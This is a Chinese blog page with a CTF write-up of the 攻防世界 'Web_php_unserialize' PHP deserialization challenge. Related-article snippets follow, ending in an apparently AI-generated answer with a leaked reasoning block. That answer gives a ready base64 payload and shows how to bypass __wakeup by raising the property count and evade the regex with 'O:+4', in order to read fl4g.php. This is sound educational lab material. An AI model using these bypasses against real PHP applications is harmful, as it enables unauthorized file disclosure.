[CTF/网络安全] 攻防世界 Web_php_unserialize 解题详析

最新推荐文章于 2025-10-02 10:00:00 发布

原创

最新推荐文章于 2025-10-02 10:00:00 发布 · 655 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#web安全 #前端 #php

在这里插入图片描述

代码审计

这段代码首先定义了一个名为 Demo 的类，包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。其中：

__construce()方法用于初始化 $file 变量
__destruce方法用于输出文件内容
__wakeup() 方法检查当前对象的 $file 变量，如果不等于 index.php，则将其重置为 index.php，从而防止攻击者通过反序列化攻击来读取 fl4g.php 文件的内容。

if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

这段代码主要是用于接收 GET 参数 var，使用 base64_decode 函数对 var 进行解码，然后通过 preg_match 函数判断是否包含类似 o:2的字符串，如果存在则中断程序执行，否则调用 @unserialize 函数进行反序列化操作。

解题思路

逆向思想：由于反序列化时先执行wakeup函数，故先绕过wakeup函数，再依次绕过preg_match函数与base64编码。

构造初始POC：

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

程序员澜哥

关注关注

3
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析

等风来

05-28

5858

这段代码接收参数 var，使用 base64_decode 函数对 var 进行解码，然后通过 preg_match 函数判断是否包含类似 o:2的字符串，如果存在则中断程序执行，否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类，包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00，长度+2+类名长度，如。

【web | CTF】攻防世界 Web_php_unserialize

weixin_46301214的博客

02-21

1333

变量名：Demofile 变成 \00Demo\00，字符个数+2就行：s:10:"\00Demo\00file"大概意思应该是当反序列化的属性变量数大于当前类的属性变量数的时候，就什么安全性因素，就不触发。天命：这条反序列化题目也是比较特别，里面的漏洞知识点，在现在的php都被修复了。【绕过点二】绕过 __wakeup函数，把反序列化中的内容数量，从1改成2即可。多一个+号（具体原理也不清楚，反正当是刷经验了，上古版本的php才有的漏洞）既不简单，也不难，我也学了几天才算比较掌握。

参与评论您还未登录，请先登录后发表或查看评论

攻防世界web_php_unserialize

weixin_52268949的博客

02-06

803

web_php_unserialize 进入环境给出源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); }

攻防世界Web_php_unserialize

qq_51233573的博客

03-10

2873

最近开始刷攻防世界的web题目，遇到一个比较有意思的题目。ctf小白大家勿喷访问题目链接是一段php代码对代码进行初步审计发现unserialize函数可以确定是一个php反序列化的利用由于刚开始学习php的反序列化对php不是特别熟悉所以对代码进行逐行解析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...

攻防世界-Web-Web_php_unserialize

最新发布

2301_80797059的博客

10-02

290

1.php反序列化2.正则匹配。

【攻防世界】 Web_php_unserialize writeup

GZWZ_的博客

04-19

1471

PHP反序列化，_wakeup()绕过

攻防世界21-Web_php_unserialize-CTFWeb

LH1013886337的博客

10-14

545

'index.php’就是index.php，所以要绕过wakeup，之前提到过绕过方法就是当成员属性数目大于实际数目时可绕过wakeup方法。第二，注意到，preg_match(‘/[oc]:\d+:/i’, $var)，还有个正则匹配，意思是o或c:几个数字:，末尾的i==> 修饰符，表示忽略大小写，可以用+号来进行绕过。需要注意的是，s:10,他其实是有10个字符，并不是Demofile而是’\x00Demo\x00file’中间不是空格(\x20)，而是字符，所以不能复制结果，而要一次性转化。

攻防世界——Web_php_unserialize

weixin_73942557的博客

10-30

302

访问网页以后首先显示这段源码，分析一下代码结构，包含一个类。里面包含了三个魔术方法：__construct\__destruct\__wakeup 后面的判断中包含了isset魔术方法，base64_decode解密，正则表达式判断。那么现在来思考如何绕过 1、@unserialize($var); @符号抑制了错误输出，所以无法通过这里进行信息获取 2、当调用这个脚本时会触发__wakeup魔术方法，需要对它进行绕过那么我们通过改变让这个参数大于后面的index.php文件 $f

攻防世界 Web_php_unserialize

Bulestardemon的博客

01-24

761

【代码】攻防世界 Web_php_unserialize。

攻防世界---web---Web_php_unserialize

2201_75556700的博客

06-02

1709

表示的是一个对象，后面的数字4表示类名的长度。通过将4替换为+4，可以使正则表达式无法匹配，从而绕过检查。：最后，将修改后的序列化字符串进行Base64编码，然后输出。类的实例，并对其进行序列化，然后将序列化后的字符串赋值给变量。这样的正则表达式检查。原始的序列化字符串中，6、在源代码中我们需要绕过几个函数。7、运行代码可以看到序列后的结果。4、根据代码中的提示，我们将。的类，该类有一个私有属性。通过将序列化字符串中的。：这行代码的目的是绕过。：这行代码的目的是绕过。

攻防世界-Web_php_unserialize

m0_62094846的博客

01-11

1035

<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() ...

攻防世界 web Web_php_unserialize

汗的博客

08-24

798

攻防世界 web 高手区 Web_php_unserialize 资源&工具 PHP 手册 W3School的PHP 参考手册 write up 源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { e

【攻防世界】Web_php_unserialize

m0_74979597的博客

09-21

457

这里为什么过滤的是：‘o：数字’和‘c：数字’呢而且不区分大小写；因为serialize() 的参数为 object ，参数类型有对象 " O " ，序列化字符串的格式为参数格式:参数名长度， " O:4 " 字符串会被过滤；对象的属性个数有关，如果序列化后的字符串中表示属性个数的数字与真实属性个数一致，那么i就调用__wakeup()函数 ,不一致就ok了；str_replace('O:4', 'O:+4',$C) 代替函数，冲字符串y中寻找'O:4',并替换；从题目：知道反序列化；

攻防世界——Web——Web_php_unserialize

慎铭的博客

02-22

841

题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup

攻防世界-web-Web_php_unserialize

wuh2333的博客

06-02

830

2.1 __wakeup函数：若在对象的魔法函数中存在的__wakeup方法，那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法，但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。根据以上分析，我们将Demo后门的1改为2即可绕过__wakeup函数，O:4改为O:+4即可绕过正则，再进行base64编码即可（这里注意一定要再代码中处理，线上以及一些工具上进行base64和php代码中进行base64获取到的结果不一样）

攻防世界web新手题Web_php_unserialize

03-28

<think>好的，我现在需要帮助用户解决攻防世界中Web_php_unserialize的CTF题目。首先，用户希望了解解题思路，特别是针对PHP反序列化的新手题。我应该结合用户提供的引用内容来整理答案。首先，我需要回顾用户提供的引用。引用[4]详细分析了Demo类的结构，包括__wakeup魔术方法和如何绕过它。引用[2]提到了当__wakeup被调用时会退出，所以可能需要绕过这个方法的执行。引用[5]提到了绕过__wakeup的方法，比如修改对象属性的数量。此外，引用[1]和[3]提供了PHP反序列化的基础知识和phps文件的作用，可能对解题有帮助。接下来，解题步骤可能需要包括以下部分： 1. **代码分析**：查看题目提供的PHP代码，找到反序列化的入口和可能的漏洞点。比如，是否存在反序列化时的__wakeup方法，或者反序列化后触发的__destruct方法。 2. **绕过__wakeup**：根据引用[2]和引用[4]，如果__wakeup方法会终止程序或修改关键变量，就需要绕过它。通常可以通过修改序列化字符串中的属性数量，使其大于实际数量，从而避免__wakeup的执行。例如，将O:4改为O:+4，或者调整属性数量。 3. **处理正则过滤**：引用[4]提到代码中可能使用preg_match来检查序列化字符串，如匹配类似O:数字的情况。这时候需要绕过这种过滤，比如使用O:+4代替O:4，或者在数字前添加加号。 4. **构造Payload**：构造一个恶意序列化字符串，触发__destruct方法，从而读取flag文件。例如，将$file变量设置为fl4g.php，在对象销毁时输出其内容。 5. **Base64编码**：根据引用[4]和引用[5]，可能需要将序列化后的字符串进行Base64编码，以符合题目参数的要求。 6. **利用私有变量处理**：如果涉及私有变量，需要注意序列化时的格式，比如%00类名%00变量名，但可能需要URL编码处理。在整理步骤时，需要确保每个部分都有对应的引用支持，并正确标注引用来源。同时，用户可能需要具体的示例payload和步骤说明，例如如何修改属性数量，如何绕过正则表达式等。此外，用户可能还需要相关的学习资源或常见技巧，比如魔术方法的作用、反序列化漏洞的原理，这些可以结合引用内容中的知识点进行补充。最后，生成相关问题，帮助用户进一步学习，比如如何绕过正则表达式、其他魔术方法的影响，或者私有变量的处理方式等。需要确保回答结构清晰，分步骤说明，并且引用正确。同时，检查是否有遗漏的步骤或错误，比如是否应该使用大写C还是O，或者Base64编码后的字符串是否需要特殊处理等。</think>### Web_php_unserialize 解题思路 #### 一、题目分析 1. **代码审查** 题目通常提供PHP源码（可能通过`.phps`文件显示[^3]）。核心逻辑如下： - 类中包含`__wakeup()`方法，会强制重置关键变量（如将`$file`设为`index.php`[^4]）。 - 反序列化入口通过`unserialize(base64_decode($_GET['var']))`接收参数[^5]。 - 存在正则过滤`preg_match('/[oc]:\d+:/i')`，阻止以`O:数字`开头的序列化字符串。 2. **漏洞定位** 目标是通过反序列化触发`__destruct()`方法，读取`fl4g.php`文件内容。需绕过以下限制： - **绕过`__wakeup()`**：修改序列化字符串中对象属性数量。 - **绕过正则过滤**：调整序列化字符串格式。 --- #### 二、解题步骤 1. **构造恶意类** 假设题目类名为`Demo`，其`$file`属性为目标文件`fl4g.php`： ```php class Demo { private $file = 'fl4g.php'; } ``` 2. **生成序列化字符串** - 序列化对象： ```php $obj = new Demo(); $serialized = serialize($obj); ``` 输出类似：`O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}`。 - **绕过`__wakeup()`**：修改属性数量为**大于实际值**（如从`1`改为`2`）： ```php $payload = str_replace(':1:', ':2:', $serialized); ``` - **绕过正则过滤**：将`O:4`改为`O:+4`或`O:4`后添加注释符`%2b`（`+`的URL编码）： ```php $payload = preg_replace('/O:\d+/', 'O:+4', $payload); ``` 3. **Base64编码** 题目要求参数`var`需Base64编码[^5]： ```php $final_payload = base64_encode($payload); ``` 4. **发送Payload** 通过URL传递参数： ``` http://题目地址?var=<?php echo $final_payload; ?> ``` --- #### 三、关键技巧 1. **魔术方法绕过** - `__wakeup()`在反序列化时自动调用，但若对象属性数被修改为超过实际值，则不会触发[^2][^4]。 - `__destruct()`在对象销毁时触发，可用于执行关键操作（如读取文件）。 2. **正则绕过** - 使用`O:+4`代替`O:4`，利用`+`符号绕过`\d+`匹配。 - 若过滤严格，可尝试Unicode编码或特殊符号注入。 --- #### 四、示例Payload 原始序列化字符串： ``` O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";} ``` 修改后： ``` O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";} ``` Base64编码结果： ``` TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== ``` ---